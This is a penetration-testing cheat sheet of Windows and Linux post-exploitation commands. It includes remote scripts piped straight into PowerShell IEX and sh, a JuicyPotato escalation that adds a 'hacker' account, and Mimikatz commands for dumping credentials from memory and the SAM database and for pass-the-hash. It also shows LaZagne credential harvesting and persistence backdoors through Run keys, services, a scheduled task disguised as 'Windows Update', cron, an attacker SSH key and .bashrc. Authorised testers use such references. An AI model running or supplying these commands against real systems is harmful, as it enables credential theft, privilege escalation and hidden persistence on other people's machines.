Windows Post-Exploitation
System Information Gathering
# System info
systeminfo
hostname
whoami
whoami /priv
whoami /groups
# Network configuration
ipconfig /all
route print
arp -a
netstat -an
Windows Privilege Escalation Tools
# WinPEAS
IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
# PowerUp
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks
Common Windows Privilege Escalation Vectors
Unquoted Service Paths
Exploiting service path vulnerabilities
Service Permissions
Weak service configurations
Registry AutoRuns
Persistent startup programs
Token Impersonation
SeImpersonatePrivilege exploitation
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""
# Token impersonation (JuicyPotato)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c net user hacker Password123 /add" -t *
Linux Post-Exploitation
System Information Gathering
# System information
uname -a
cat /etc/*-release
hostname
whoami
id
Linux Privilege Escalation Tools
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Common Linux Privilege Escalation Vectors
# SUID binaries
find / -type f -perm -4000 2>/dev/null
# Sudo privileges
sudo -l
# Cron jobs
crontab -l
cat /etc/crontab
Credential Harvesting
Mimikatz
# Extract passwords from memory
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
# Dump SAM database
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"
# Pass-the-hash
mimikatz "sekurlsa::pth /user:administrator /domain:domain.com /ntlm:hash"
LaZagne
# Run all modules
./lazagne.exe all
# Specific modules
./lazagne.exe browsers
./lazagne.exe wifi
./lazagne.exe databases
Persistence Techniques
Windows Persistence
# Registry persistence
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Backdoor" /t REG_SZ /d "C:\temp\payload.exe"
# Service persistence
sc create "Backdoor" binpath="C:\temp\payload.exe" start=auto
sc start "Backdoor"
# Scheduled task persistence
schtasks /create /tn "Windows Update" /tr "C:\temp\payload.exe" /sc onlogon /ru "NT AUTHORITY\SYSTEM"
Linux Persistence
# Cron jobs
echo "* * * * * /tmp/payload.sh" | crontab -
# SSH keys
mkdir -p /home/user/.ssh
echo "ssh-rsa AAAA...attacker-public-key" >> /home/user/.ssh/authorized_keys
chmod 600 /home/user/.ssh/authorized_keys
# Bashrc persistence
echo "/tmp/payload.sh &" >> /home/user/.bashrc
Legal and Ethical Requirements:
- Only use these techniques on authorized systems
- Document all post-exploitation activities
- Remove persistence mechanisms after testing
- Protect any harvested credentials securely
- Report findings through proper channels